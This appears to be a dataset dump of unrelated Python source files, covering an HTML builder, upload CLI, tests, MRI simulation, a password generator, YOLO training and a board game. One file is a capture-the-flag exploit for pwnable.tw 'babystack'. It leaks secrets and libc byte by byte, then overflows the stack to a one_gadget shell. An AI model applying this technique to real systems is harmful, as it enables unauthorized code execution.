text stringlengths 8 6.05M |
|---|
class HTML:
def __init__(self, output = None):
self.output = output
self.childrens = []
def __enter__(self):
return self
def __add__(self, other):
self.childrens.append(other)
return self
def __exit__(self, *args):
print("<html>")
for child in self.childrens:
print(str(child))
print("</html>")
class TopLevelTag:
def __init__(self, tag):
self.tag = tag
self.childrens = []
def __enter__(self):
return self
def __add__(self, other):
return TopLevelTag(self.childrens.append(other))
def __str__(self):
print("<{tag}>".format(tag = self.tag))
for child in self.childrens:
print(str(child))
print("</{tag}>".format(tag = self.tag))
def __exit__(self, *attrs):
return self
class Tag:
def __init__(self, tag, is_single = False, **atrs):
self.tag = tag
self.text = ""
self.is_single = is_single
self.attributes = atrs
def __enter__(self):
return self
def __exit__(self, *atrs):
return self
def __str__(self):
attrs = []
for key, value in self.attributes.items:
attrs.append('{key}="{value}"'.format(key, value))
attr_string = " ".join(attrs)
if self.is_single:
print("<{tag} {attrs}/>".format(tag = self.tag, attrs = attr_string))
else:
print("<{tag} {attrs}>{text}</{tag}>".format(tag = self.tag, attrs = attr_string, text = self.text))
if __name__ == "__main__":
with HTML(output=None) as doc:
with TopLevelTag("head") as head:
with Tag("title") as title:
title.text = "hello"
head += title
doc += head
with TopLevelTag("body") as body:
with Tag("h1", klass=("main-text",)) as h1:
h1.text = "Test"
body += h1
with Tag("div", klass=("container", "container-fluid"), id="lead") as div:
with Tag("p") as paragraph:
paragraph.text = "another test"
div += paragraph
with Tag("img", is_single=True, src="/icon.png") as img:
div += img
body += div
doc += body
|
"""CLI to upload data to a MetaGenScope Server."""
from sys import stderr
import click
from metagenscope_cli.sample_sources.data_super_source import DataSuperSource
from metagenscope_cli.sample_sources.file_source import FileSource
from .utils import batch_upload, add_authorization, parse_metadata
@click.group()
def upload():
"""Handle different types of uploads."""
pass
@upload.command()
@add_authorization()
@click.argument('metadata_csv')
@click.argument('sample_names', nargs=-1)
def metadata(uploader, metadata_csv, sample_names):
"""Upload a CSV metadata file."""
parsed_metadata = parse_metadata(metadata_csv, sample_names)
for sample_name, metadata_dict in parsed_metadata.items():
payload = {
'sample_name': str(sample_name),
'metadata': metadata_dict,
}
try:
response = uploader.knex.post('/api/v1/samples/metadata', payload)
click.echo(response)
except Exception: # pylint:disable=broad-except
print(f'[upload-metadata-error] {sample_name}', file=stderr)
@upload.command()
@add_authorization()
@click.option('-u', '--group-uuid', default=None)
@click.option('-d', '--datasuper-group', default=None)
@click.option('-g', '--group-name', default=None)
def datasuper(uploader, group_uuid, datasuper_group, group_name):
"""Upload all samples from DataSuper repo."""
sample_source = DataSuperSource(group=datasuper_group)
samples = sample_source.get_sample_payloads()
batch_upload(uploader, samples, group_uuid=group_uuid, upload_group_name=group_name)
@upload.command()
@add_authorization()
@click.option('-u', '--group-uuid', default=None)
@click.option('-g', '--group-name', default=None)
@click.option('-m/-l', '--manifest/--file-list', default=False)
@click.argument('result_files', nargs=-1)
def files(uploader, group_uuid, group_name, manifest, result_files):
"""Upload all samples from llist of tool result files."""
if manifest:
result_file_list = []
for result_manifest in result_files:
with open(result_manifest) as rmf:
for line in rmf:
result_file_list.append(line.strip())
result_files = result_file_list
sample_source = FileSource(files=result_files)
samples = sample_source.get_sample_payloads()
batch_upload(uploader, samples, group_uuid=group_uuid, upload_group_name=group_name)
|
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 30 10:46:52 2017
Grab the filtered scenes, sort them based on acquisition dates, and save them as new sequentially numbered files
@author: dzelenak
"""
import os
import sys
import pprint
from shutil import copyfile
from argparse import ArgumentParser
def read_list(txtfile):
"""
:param txtfile:
:return:
"""
with open(txtfile, "r") as txt:
flist = [line[:-1] for line in txt if ".tar" in line]
if len(flist) == 0:
print(f"Could not read any lines from the file {txtfile}")
sys.exit(1)
return flist
def get_files(in_dir, lookfor):
"""
:param in_dir: <str>
:param lookfor: <str>
:return file_list: <str[]>
"""
file_list = []
for root, folders, files in os.walk(in_dir):
for file in files:
if lookfor in file and file[-4:] == ".tif":
file_list.append(os.path.join(root, file))
if len(file_list) == 0:
print(f"Could not find any files in {in_dir}")
sys.exit(1)
return sorted(file_list)
def do_work(outdir, filelist, tc_dir):
"""
:param outdir:
:param filelist:
:param tc_dir:
:return:
"""
if not os.path.exists(outdir):
os.makedirs(outdir)
lookup_files = {}
b_files = get_files(tc_dir, lookfor="brightness")
lookup_files["brightness"] = b_files
g_files = get_files(tc_dir, lookfor="greenness")
lookup_files["greenness"] = g_files
w_files = get_files(tc_dir, lookfor="wetness")
lookup_files["wetness"] = w_files
filtered_lookup = {}
filtered_list = read_list(filelist)
for key in lookup_files.keys():
temp_list = []
for ind, file in enumerate(lookup_files[key]):
for item in filtered_list:
basename = os.path.basename(item)[:-7]
if basename in file:
temp_list.append(file)
filtered_lookup[key] = sorted(temp_list)
if len(filtered_lookup[key]) == 0:
print("No matching files were found between the filtered browse and main browse lists")
sys.exit(1)
# Pull the dates from the filenames as integers
dates = [int(os.path.basename(file)[15:23]) for file in filtered_lookup["brightness"]]
# Create list of sorted dates
dates_sorted = sorted(dates)
for ind, d in enumerate(dates_sorted):
# Convert integers back to strings
dates_sorted[ind] = str(d)
dates_lookup = {}
for key in filtered_lookup.keys():
temp_list = []
for date in dates_sorted:
for file in filtered_lookup[key]:
fname = os.path.basename(file)
if fname[15:23] == date:
temp_list.append(file)
dates_lookup[key] = temp_list
pprint.pprint(dates_lookup)
new_files = {}
for key in dates_lookup.keys():
temp_list = []
for ind, file in enumerate(dates_lookup[key]):
temp_list.append(f"{outdir}{os.sep}{key}{os.sep}{str(ind + 1)}.tif")
if not os.path.exists(f"{outdir}{os.sep}{key}"):
os.makedirs(f"{outdir}{os.sep}{key}")
new_files[key] = temp_list
pprint.pprint(new_files)
out_txt = outdir + os.sep + "tcband_to_chrono.txt"
with open(out_txt, "w") as txt:
for key in dates_lookup.keys():
for old, new in zip(dates_lookup[key], new_files[key]):
# Copy to the new file
copyfile(old, new)
# Record which file corresponds to which sequential number
txt.write(os.path.splitext(os.path.basename(old))[0] + " ---- " +
os.path.splitext(os.path.basename(new))[0] + "\n")
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-tc", dest="tc_dir", required=True, type=str,
help="Full path to the root directory containing tasseled cap bands")
parser.add_argument("-f", dest="filelist", required=True, type=str,
help="The full path to the .txt file listing the filtered scenes")
parser.add_argument("-o", dest="outdir", required=True, type=str,
help="Full path to the output directory that will contain the renamed jpgs")
args = parser.parse_args()
do_work(**vars(args))
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for encoders."""
# internal imports
import tensorflow as tf
from magenta.lib import melodies_lib
from magenta.lib import sequence_to_melodies
NO_EVENT = melodies_lib.NO_EVENT
NOTE_OFF = melodies_lib.NOTE_OFF
def make_sequence_example(inputs, labels):
input_features = [tf.train.Feature(float_list=tf.train.FloatList(value=input_))
for input_ in inputs]
label_features = [tf.train.Feature(int64_list=tf.train.Int64List(value=[label]))
for label in labels]
feature_list = {
'inputs': tf.train.FeatureList(feature=input_features),
'labels': tf.train.FeatureList(feature=label_features)
}
feature_lists = tf.train.FeatureLists(feature_list=feature_list)
return tf.train.SequenceExample(feature_lists=feature_lists)
def one_hot(value, length):
return [1.0 if value == i else 0.0 for i in range(length)]
class CreateDatasetTest(tf.test.TestCase):
def testBasicOneHotEncoder(self):
steps_per_beat = 4
transpose_to_key = 0
min_note = 48
max_note = 84
num_classes = max_note - min_note + 2
melody = melodies_lib.Melody()
melody.from_event_list(
[NO_EVENT, 60, 62, 64, NO_EVENT, NOTE_OFF, 65, 67, NOTE_OFF, 69, 71, 72,
NO_EVENT, NOTE_OFF, 74, 76, 77, 79, NO_EVENT, NOTE_OFF])
transformed_melody = [NO_EVENT, 12, 14, 16, NO_EVENT, NOTE_OFF, 17, 19,
NOTE_OFF, 21, 23, 24, NO_EVENT, NOTE_OFF, 26, 28,
29, 31, NO_EVENT, NOTE_OFF]
expected_inputs = ([one_hot(note + 2, num_classes)
for note in transformed_melody] +
[one_hot(0, num_classes)] * 12)
expected_labels = [note + 2 for note in transformed_melody[1:]] + [0] * 13
expected_sequence_example = make_sequence_example(expected_inputs,
expected_labels)
sequence_example, _ = sequence_to_melodies.basic_one_hot_encoder(
melody, steps_per_beat, min_note, max_note, transpose_to_key)
self.assertEqual(expected_sequence_example, sequence_example)
def testBasicOneHotEncoderTruncateNoteOff(self):
steps_per_beat = 4
transpose_to_key = 0
min_note = 48
max_note = 84
num_classes = max_note - min_note + 2
melody = melodies_lib.Melody()
melody.from_event_list(
[NO_EVENT, 60, 62, 64, NO_EVENT, NOTE_OFF, 65, 67, NOTE_OFF, 69, 71, 72,
NO_EVENT, NOTE_OFF, 74, 76, NOTE_OFF])
transformed_melody = [NO_EVENT, 12, 14, 16, NO_EVENT, NOTE_OFF, 17, 19,
NOTE_OFF, 21, 23, 24, NO_EVENT, NOTE_OFF, 26, 28]
expected_inputs = [one_hot(note + 2, num_classes)
for note in transformed_melody]
expected_labels = ([note + 2 for note in transformed_melody[1:]] +
[NOTE_OFF + 2])
expected_sequence_example = make_sequence_example(expected_inputs,
expected_labels)
sequence_example, _ = sequence_to_melodies.basic_one_hot_encoder(
melody, steps_per_beat, min_note, max_note, transpose_to_key)
self.assertEqual(expected_sequence_example, sequence_example)
def testBasicOneHotEncoderOctaveSquash(self):
steps_per_beat = 4
transpose_to_key = 0
min_note = 48
max_note = 84
num_classes = max_note - min_note + 2
melody = melodies_lib.Melody()
melody.from_event_list(
[NO_EVENT, 84, 86, 52, NO_EVENT, NOTE_OFF, 65, 67, NOTE_OFF, 69, 71, 72,
NO_EVENT, NOTE_OFF, 38, 40, NOTE_OFF])
transformed_melody = [NO_EVENT, 24, 26, 4, NO_EVENT, NOTE_OFF, 17, 19,
NOTE_OFF, 21, 23, 24, NO_EVENT, NOTE_OFF, 2, 4]
expected_inputs = [one_hot(note + 2, num_classes)
for note in transformed_melody]
expected_labels = ([note + 2 for note in transformed_melody[1:]] +
[NOTE_OFF + 2])
expected_sequence_example = make_sequence_example(expected_inputs,
expected_labels)
sequence_example, _ = sequence_to_melodies.basic_one_hot_encoder(
melody, steps_per_beat, min_note, max_note, transpose_to_key)
self.assertEqual(expected_sequence_example, sequence_example)
def testBasicOneHotEncoderTransposeKey(self):
steps_per_beat = 4
transpose_to_key = 0
min_note = 48
max_note = 84
num_classes = max_note - min_note + 2
melody = melodies_lib.Melody()
melody.from_event_list(
[NO_EVENT, 61, 63, 65, NO_EVENT, NOTE_OFF, 66, 68, NOTE_OFF, 70, 72, 73,
NO_EVENT, NOTE_OFF, 75, 77, NOTE_OFF])
transformed_melody = [NO_EVENT, 12, 14, 16, NO_EVENT, NOTE_OFF, 17, 19,
NOTE_OFF, 21, 23, 24, NO_EVENT, NOTE_OFF, 26, 28]
expected_inputs = [one_hot(note + 2, num_classes)
for note in transformed_melody]
expected_labels = ([note + 2 for note in transformed_melody[1:]] +
[NOTE_OFF + 2])
expected_sequence_example = make_sequence_example(expected_inputs,
expected_labels)
sequence_example, _ = sequence_to_melodies.basic_one_hot_encoder(
melody, steps_per_beat, min_note, max_note, transpose_to_key)
self.assertEqual(expected_sequence_example, sequence_example)
if __name__ == '__main__':
tf.test.main()
|
from PrettyData import *
|
# -*- coding: utf-8 -*-
"""MRI simulation functions.
"""
import numpy as np
__all__ = ["birdcage_maps"]
def birdcage_maps(shape, r=1.5, nzz=8, dtype=complex):
"""Simulates birdcage coil sensitivies.
Args:
shape (tuple of ints): sensitivity maps shape,
can be of length 3, and 4.
r (float): relative radius of birdcage.
nzz (int): number of coils per ring.
dtype (Dtype): data type.
Returns:
array.
"""
if len(shape) == 3:
nc, ny, nx = shape
c, y, x = np.mgrid[:nc, :ny, :nx]
coilx = r * np.cos(c * (2 * np.pi / nc))
coily = r * np.sin(c * (2 * np.pi / nc))
coil_phs = -c * (2 * np.pi / nc)
x_co = (x - nx / 2.0) / (nx / 2.0) - coilx
y_co = (y - ny / 2.0) / (ny / 2.0) - coily
rr = np.sqrt(x_co**2 + y_co**2)
phi = np.arctan2(x_co, -y_co) + coil_phs
out = (1.0 / rr) * np.exp(1j * phi)
elif len(shape) == 4:
nc, nz, ny, nx = shape
c, z, y, x = np.mgrid[:nc, :nz, :ny, :nx]
coilx = r * np.cos(c * (2 * np.pi / nzz))
coily = r * np.sin(c * (2 * np.pi / nzz))
coilz = np.floor(c / nzz) - 0.5 * (np.ceil(nc / nzz) - 1)
coil_phs = -(c + np.floor(c / nzz)) * (2 * np.pi / nzz)
x_co = (x - nx / 2.0) / (nx / 2.0) - coilx
y_co = (y - ny / 2.0) / (ny / 2.0) - coily
z_co = (z - nz / 2.0) / (nz / 2.0) - coilz
rr = (x_co**2 + y_co**2 + z_co**2) ** 0.5
phi = np.arctan2(x_co, -y_co) + coil_phs
out = (1 / rr) * np.exp(1j * phi)
else:
raise ValueError("Can only generate shape with length 3 or 4")
rss = sum(abs(out) ** 2, 0) ** 0.5
out /= rss
return out.astype(dtype)
|
import random
characters = "abcdefghijklmnopqrsqrstuvwxyz"
numbers = 1234567890
symbols = "!@#$%^&*"
print('''
Passifier
Running On Version: 1.0
Developed By github.com/AlirezaKJ/
''')
while True:
while True:
print('''
Press Enter To Continue Or Type Advanced To Enter Advanced Mode
''')
mode = input(" > ")
if mode.lower()=="advanced":
print('''
Type Every Character You Want In Your Password
''')
tempcharacters=input()
tempcharacters=str(tempcharacters)
while True:
try:
password__length = int(input("Enter Your Password Length : "))
break
except ValueError:
print("Wrong Type Please Enter A Number")
while True:
try:
password__count = int(input("How Many Password Do You Want : "))
print("")
break
except ValueError:
print("Wrong Type Please Enter A Number")
print("")
for x in range(0,password__count):
password = ""
for x in range(0,password__length):
password_x = random.choice(tempcharacters)
password = password + password_x
print(password)
print('')
print('')
else:
break
while True:
question = input("Do You Want Uppercase Alphabets In Your Password? ")
if question.lower() == "yes":
characters = characters + characters.upper()
break
elif question.lower() == "no":
break
else:
print(question + " Is Wrong Valid Answers Are yes Or no")
print("")
while True:
question = input("Do You Want Numbers In Your Password? ")
if question.lower() == "yes":
characters = characters + str(numbers)
break
elif question.lower() == "no":
break
else:
print(question + " Is Wrong Valid Answers Are yes Or no")
print("")
while True:
question = input("Do You Want Special Symbols(!@#$%^&*) In Your Password? ")
if question.lower() == "yes":
characters = characters + symbols
break
elif question.lower() == "no":
break
else:
print(question + " Is Wrong Valid Answers Are yes Or no")
print("")
while True:
try:
password__length = int(input("Enter Your Password Length : "))
break
except ValueError:
print("Wrong Type Please Enter A Number")
while True:
try:
password__count = int(input("How Many Password Do You Want : "))
print("")
break
except ValueError:
print("Wrong Type Please Enter A Number")
print("")
print("")
print("")
for x in range(0,password__count):
password = ""
for x in range(0,password__length):
password_x = random.choice(characters)
password = password + password_x
print(password)
print("")
print('')
question = input("Do You Want Another Password? ")
if question.lower() == "yes":
pass
elif question.lower() == "no":
exit()
else:
print(question + " Is Wrong Valid Answers Are yes Or no") |
print("This is a string \nin \"Python\" ")
phrase = "Truong Ho"
print(phrase.lower())
print(len(phrase))
print(phrase[0].isupper())
print(phrase.index("Ho"))
print(phrase.replace(" ", " Lam "))
|
from pwn import *
r = remote("chall.pwnable.tw", 10205)
#r = process("./babystack")
#r = process('./babystack', env={"LD_PRELOAD":"./libc_64.so.6"})
def transIntToBytes(int_):
return hex(int.from_bytes(int_, byteorder="little"))
### leak rand_num
stack_element = b''
rand_num = b''
for t in range(16):
payload = b''
for i in range(1, 256):
#print(i)
r.recvuntil(">> ")
r.send("1"+"a"*15)
r.recvuntil(":")
payload = bytes([i])
r.sendline(stack_element + payload)
msg = r.recvline().strip()
if msg[:5] == b'Login':
r.recvuntil(">> ") ## logout
r.send("1"+"a"*15)
print(msg)
break
if i == 255:
payload = b'\x00'
stack_element += payload
rand_num += payload
print(f'rand_num1: {transIntToBytes(rand_num[0:8])}')
print(f'rand_num2: {transIntToBytes(rand_num[8:16])}')
########################
r.recvuntil(">> ")
#input("@")
r.send("1")
r.recvuntil(":")
r.send(b'\x00' + b'b'*0x47) # 0x3f
r.recvuntil(">> ")
r.send("3")
r.recvuntil(":")
r.send("c"*0x28)
## logout
r.recvuntil(">> ")
r.send("1")
#stack_element = b'b'*16 + b'1' + b'a'*15
stack_element = b'b'*8
leak = b''
for t in range(6):
payload = b''
for i in range(1, 256):
#print(i)
r.recvuntil(">> ")
r.send("1"+"a"*15)
r.recvuntil(":")
payload = bytes([i])
r.sendline(stack_element + payload)
msg = r.recvline().strip()
if msg[:5] == b'Login':
r.recvuntil(">> ") ## logout
r.send("1"+"a"*15)
print(msg)
break
if i == 255:
payload = b'\x00'
stack_element += payload
leak += payload
print(f'leak: {transIntToBytes(leak)}')
libc_base = int.from_bytes(leak, byteorder="little") - 0x78439 # 0x3ec760
print(f'libc_base: {hex(libc_base)}')
one_gadget = libc_base + 0xf0567 # 0xef6c4
'''
### leak canary
r.recvuntil(">> ")
r.send("1")
r.recvuntil(":")
r.send(b'\x00' + b'b'*0x48)
r.recvuntil(">> ")
r.send("3")
r.recvuntil(":")
r.send("c"*0x28)
## logout
r.recvuntil(">> ")
r.send("1")
stack_element = b'b'*9
canary = b'\x00'
for t in range(7):
payload = b''
for i in range(1, 256):
#print(i)
r.recvuntil(">> ")
r.send("1"+"a"*15)
r.recvuntil(":")
payload = bytes([i])
r.sendline(stack_element + payload)
msg = r.recvline().strip()
if msg[:5] == b'Login':
r.recvuntil(">> ") ## logout
r.send("1"+"a"*15)
print(msg)
break
if i == 255:
payload = b'\x00'
stack_element += payload
canary += payload
print(f'canary: {transIntToBytes(canary)}')
'''
## get shell by one gadget
print(f'one_gadget: {hex(one_gadget)}')
r.recvuntil(">> ")
r.send("1")
r.recvuntil(":")
r.send(b'\x00' + b'x'*0x3f + rand_num[0:8] + rand_num[8:16] + b'i'*8 + b'j'*8 + b'k'*8 + p64(one_gadget))
r.recvuntil(">> ")
r.send("3")
r.recvuntil(":")
r.send("c"*0x28)
r.recvuntil(">> ")
input("@")
r.send("2")
r.interactive()
|
#! /usr/bin/env python
import sys
import ddlib # DeepDive python utility
ARR_DELIM = '~^~'
# For each input tuple
for row in sys.stdin:
parts = row.strip().split('\t')
if len(parts) != 6:
print >>sys.stderr, 'Failed to parse row:', row
continue
# Get all fields from a row
words = parts[0].split(ARR_DELIM)
relation_id = parts[1]
p1_start, p1_length, p2_start, p2_length = [int(x) for x in parts[2:]]
# Unpack input into tuples.
span1 = ddlib.Span(begin_word_id=p1_start, length=p1_length)
span2 = ddlib.Span(begin_word_id=p2_start, length=p2_length)
# Features for this pair come in here
features = set()
# Feature 1: Bag of words between the two phrases
words_between = ddlib.tokens_between_spans(words, span1, span2)
for word in words_between.elements:
features.add("word_between=" + word)
# Feature 2: Number of words between the two phrases
features.add("num_words_between=%s" % len(words_between.elements))
# Feature 3: Does the last word (last name) match?
last_word_left = ddlib.materialize_span(words, span1)[-1]
last_word_right = ddlib.materialize_span(words, span2)[-1]
if (last_word_left == last_word_right):
features.add("potential_last_name_match")
########################
# Improved Feature Set #
########################
# # Feature 1: Find out if a lemma of marry occurs.
# # A better feature would ensure this is on the dependency path between the two.
# words_between = ddlib.tokens_between_spans(words, span1, span2)
# lemma_between = ddlib.tokens_between_spans(obj["lemma"], span1, span2)
# married_words = ['marry', 'widow', 'wife', 'fiancee', 'spouse']
# non_married_words = ['father', 'mother', 'brother', 'sister', 'son']
# # Make sure the distance between mention pairs is not too long
# if len(words_between.elements) <= 10:
# for mw in married_words + non_married_words:
# if mw in lemma_between.elements:
# features.add("important_word=%s" % mw)
# # Feature 2: Number of words between the two phrases
# # Intuition: if they are close by, the link may be stronger.
# l = len(words_between.elements)
# if l < 5: features.add("few_words_between")
# else: features.add("many_words_between")
# # Feature 3: Does the last word (last name) match?
# last_word_left = ddlib.materialize_span(words, span1)[-1]
# last_word_right = ddlib.materialize_span(words, span2)[-1]
# if (last_word_left == last_word_right):
# features.add("potential_last_name_match")
#######################
# # Use this line if you want to print out all features extracted:
# ddlib.log(features)
for feature in features:
print str(relation_id) + '\t' + feature
|
import unittest
import Song
class SongTests(unittest.TestCase):
def setUp(self):
self.such_song = Song.Song(
"song_title", "song_artist", "song_album", 5, 523, 1024)
def test_song_init(self):
self.assertEqual("song_title", self.such_song.title)
self.assertEqual("song_artist", self.such_song.artist)
self.assertEqual("song_album", self.such_song.album)
self.assertEqual(5, self.such_song.rating)
self.assertEqual(523, self.such_song.length)
self.assertEqual(1024, self.such_song.bitrate)
def test_rate(self):
self.such_song.rate(4)
self.assertEqual(4, self.such_song.rating)
def test_rate_out_of_range(self):
with self.assertRaises(ValueError):
self.such_song.rate(200)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# Author:tjy
import sys
print(sys.path)
print(sys.argv) #打印相当路径
print(sys.argv[1])
'''
import os
dir_res = os.system("dir")
print("--->", dir_res)
dir_res = os.popen("dir").read()
print(dir_res)
#os.mkdir("new")
print(os.getpid())
''' |
import os
import argparse
import datetime
import tensorflow as tf
from text_detector.detect_net import config as cfg
from text_detector.detect_net.yolo_net import YOLONet
from text_detector.utils.timer import Timer
from text_detector.utils.import_data import text_detect_obj
from text_detector.utils.logging import yolo_log
from pre_process.report import send_email
slim = tf.contrib.slim
# 这部分代码主要实现的是对已经构建好的网络和损失函数利用数据进行训练
# 在训练过程中,对变量采用了指数平均数(exponential moving average (EMA))
# 来提高整体的训练性能。同时,为了获得比较好的学习性能,对学习速率同向进行
# 了指数衰减,使用了 exponential_decay 函数来实现这个功能。
# 在训练的同时,对我们的训练模型(网络权重)进行保存,这样以后可以直接进行调
# 用这些权重;同时,每隔一定的迭代次数便写入 TensorBoard,这样在最后可以观察整体的情况。
class Solver(object):
def __init__(self, net, data):
self.net = net
self.data = data
self.weights_file = cfg.WEIGHTS_FILE
self.max_iter = cfg.MAX_ITER
self.initial_learning_rate = cfg.LEARNING_RATE
self.decay_steps = cfg.DECAY_STEPS
self.decay_rate = cfg.DECAY_RATE
self.staircase = cfg.STAIRCASE
self.summary_iter = cfg.SUMMARY_ITER
self.save_iter = cfg.SAVE_ITER
self.output_dir = os.path.join(
cfg.OUTPUT_DIR, datetime.datetime.now().strftime('%Y_%m_%d_%H_%M'))
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
self.save_cfg()
# tf.get_variable 和tf.Variable不同的一点是,前者拥有一个变量检查机制,
# 会检测已经存在的变量是否设置为共享变量,如果已经存在的变量没有设置为共享变量,
# TensorFlow 运行到第二个拥有相同名字的变量的时候,就会报错。
self.variable_to_restore = tf.global_variables()
self.saver = tf.train.Saver(self.variable_to_restore, max_to_keep=None)
self.ckpt_file = os.path.join(self.output_dir, 'yolo_text_detect.ckpt')
# tf 中使用 summary 来可视化我们的数据流,最终使用一个merge_all 函数来管理所有的摘要
# tf 中 summary 的计算需要 feed 数据
self.summary_op = tf.summary.merge_all()
self.writer = tf.summary.FileWriter(self.output_dir, flush_secs=60)
self.global_step = tf.train.create_global_step()
# 学习率衰减方案
self.learning_rate = tf.train.exponential_decay(
self.initial_learning_rate, self.global_step, self.decay_steps,
self.decay_rate, self.staircase, name='learning_rate')
# 指定模型优化方案:使用GD求解
self.optimizer = tf.train.GradientDescentOptimizer(
learning_rate=self.learning_rate)
# 基于模型,损失函数和优化方案进行优化
self.train_op = slim.learning.create_train_op(
self.net.total_loss, self.optimizer, global_step=self.global_step)
gpu_options = tf.GPUOptions()
config = tf.ConfigProto(gpu_options=gpu_options)
self.sess = tf.Session(config=config)
self.sess.run(tf.global_variables_initializer())
# if cfg.WEIGHTS_FILE is not None:
if self.weights_file is not None:
print(self.weights_file)
log_str = 'Restoring weights from: ' + self.weights_file
print(log_str)
yolo_log(log_str)
self.saver.restore(self.sess, self.weights_file)
self.writer.add_graph(self.sess.graph)
def train(self):
# 设定计时器
train_timer = Timer()
load_timer = Timer()
# 总共迭代 max_iter 次
for step in range(1, self.max_iter + 1):
load_timer.tic()
# 获取输入的 img 和 label,每次调用返回不同的数据对
images, labels = self.data.get()
load_timer.toc()
# 将输入数据转化为 feed_dict 形式输入网络
feed_dict = {self.net.images: images,
self.net.labels: labels}
# 检查点:每迭代 summary_iter=100,输出当前的迭代位置,损失以及相关状态
if step % self.summary_iter == 0:
# 每迭代10个 summary_iter=1000,对模型配置和参数进行存档
if step % (self.summary_iter * 10) == 0:
train_timer.tic()
# 执行一个会话,获取当前阶段的运行情况,损失,以及优化损失
summary_str, loss, _ = self.sess.run(
[self.summary_op, self.net.total_loss, self.train_op],
feed_dict=feed_dict)
train_timer.toc()
# use format to remake the log info.
log_str = '''
{} Epoch: {},
Step: {},
Learning rate: {},
Loss: {:5.3f}\n
Speed: {:.3f}s/iter,
Load: {:.3f}s/iter,
Remain: {}
'''.format(
datetime.datetime.now().strftime('%m-%d %H:%M:%S'),
self.data.epoch,
int(step),
round(self.learning_rate.eval(session=self.sess), 6),
loss,
train_timer.average_time,
load_timer.average_time,
train_timer.remain(step, self.max_iter)
)
print(log_str)
yolo_log(log_str)
else: # 只进行检查,不存档
train_timer.tic()
# 未到10倍存档节点,则继续训练网络,进行两种工作:计算 summary 和优化损失
summary_str, _ = self.sess.run(
[self.summary_op, self.train_op],
feed_dict=feed_dict)
train_timer.toc()
# 写入日志
self.writer.add_summary(summary_str, step)
else: # 不检查也不存档,只进行训练
train_timer.tic()
self.sess.run(self.train_op, feed_dict=feed_dict)
train_timer.toc()
# 存档点:这里与检查点是分开的,每进行 save_iter 步对模型配置和参数进行存档
if step % self.save_iter == 0:
# 提示信息
log_str = '{} Saving checkpoint file to: {}'.format(
datetime.datetime.now().strftime('%m-%d %H:%M:%S'),
self.output_dir)
print(log_str)
yolo_log(log_str)
# save 操作
self.saver.save(
self.sess, self.ckpt_file, global_step=self.global_step)
def save_cfg(self):
# 存储模型参数,开始训练时就执行一遍
with open(os.path.join(self.output_dir, 'config.txt'), 'w') as f:
cfg_dict = cfg.__dict__
for key in sorted(cfg_dict.keys()):
if key[0].isupper():
cfg_str = '{}: {}\n'.format(key, cfg_dict[key])
f.write(cfg_str)
def update_config_paths(data_dir, weights_file):
cfg.DATA_PATH = data_dir
cfg.CACHE_PATH = os.path.join(cfg.DATA_PATH, 'cache')
cfg.OUTPUT_DIR = os.path.join(cfg.DATA_PATH, 'output')
cfg.WEIGHTS_DIR = os.path.join(cfg.DATA_PATH, 'weights')
cfg.WEIGHTS_FILE = os.path.join(cfg.WEIGHTS_DIR, weights_file)
def main():
# parser: convert input message into class or data structs
parser = argparse.ArgumentParser()
parser.add_argument('--weights', default="YOLO_text_detect.ckpt", type=str)
parser.add_argument('--data_dir', default="data", type=str)
parser.add_argument('--threshold', default=0.2, type=float)
parser.add_argument('--iou_threshold', default=0.5, type=float)
parser.add_argument('--gpu', default='0', type=str)
args = parser.parse_args()
if args.gpu is not None:
cfg.GPU = args.gpu
if args.data_dir != cfg.DATA_PATH:
update_config_paths(args.data_dir, args.weights)
# os.environ['CUDA_VISIBLE_DEVICES'] = '0'
os.environ['CUDA_VISIBLE_DEVICES'] = cfg.GPU
yolo = YOLONet()
data_set = text_detect_obj('train')
solver = Solver(yolo, data_set)
print('Start training ...')
yolo_log('Start training ...')
solver.train()
print('Done training.')
yolo_log('Done training.')
if __name__ == '__main__':
# python train.py --weights YOLO_small.ckpt --gpu 0
main()
|
# Name: Wes MacDonald
# Date: 11/30/2020
# Description: A program to simulate playing the abstract board game Focus/Domination
class Board:
"""represents a board"""
def __init__(self, p1_color, p2_color):
"""initializes a board object
:param p1_color: player 1 piece color
:type p1_color: str
:param p2_color: player 2 piece color
:type p2_color: str
"""
# list to hold lists of coords for each space on the board @ index 0, and piece(s) in a stack at that coord
# pieces start @ index 1 (bottom/base of stack), to the end of the list (top of stack)
self._full_board_list = []
# initialize tuples of the coords @ index 0 of the list
for row in range(6):
for col in range(6):
self._full_board_list.append([(row, col)])
# initialize the game pieces @ index 1 (bottom level) for game set-up
for x in range(0, len(self._full_board_list), 4):
self._full_board_list[x].append(p1_color)
for x in range(1, len(self._full_board_list), 4):
self._full_board_list[x].append(p1_color)
for x in range(2, len(self._full_board_list), 4):
self._full_board_list[x].append(p2_color)
for x in range(3, len(self._full_board_list), 4):
self._full_board_list[x].append(p2_color)
def get_full_board_list(self):
"""get method for _full_board_list
:return: a list of lists of the board, containing coords and pieces @ each coord
:rtype: list
"""
return self._full_board_list
def show_board(self):
"""method to show the board in a visually understandable way, * = empty space"""
for row in range(0, 36, 6):
for col in range(6):
list_len = (len(self._full_board_list[row+col]))
for num in range(1, list_len):
print(self._full_board_list[row+col][num], end="")
print((5 - (len(self._full_board_list[row+col])-1)) * "*", end=" ")
print("")
print("-----------------------------------")
class Player:
"""represents a player"""
def __init__(self, name, color):
"""initializes a player object
:param name: name of player
:type name: str
:param color: color of player pieces
:type color: str
"""
self._player_name = name
self._player_color = color
self._captured_pieces = 0
self._reserve_pieces = 0
def get_player_name(self):
"""get method for _player_name
:return: player's name
:rtype: str
"""
return self._player_name
def get_player_color(self):
"""get method for _player_color
:return: player's color
:rtype: str
"""
return self._player_color
def get_captured_pieces(self):
"""get method for player's _captured_pieces
:return: player's _captured_pieces
:rtype: int
"""
return self._captured_pieces
def set_captured_pieces(self, num_piece):
"""set method for player's _captured_pieces, +1 to add a piece, -1 to remove a piece
:param num_piece: piece(s) to add to or remove from a player's captured pieces
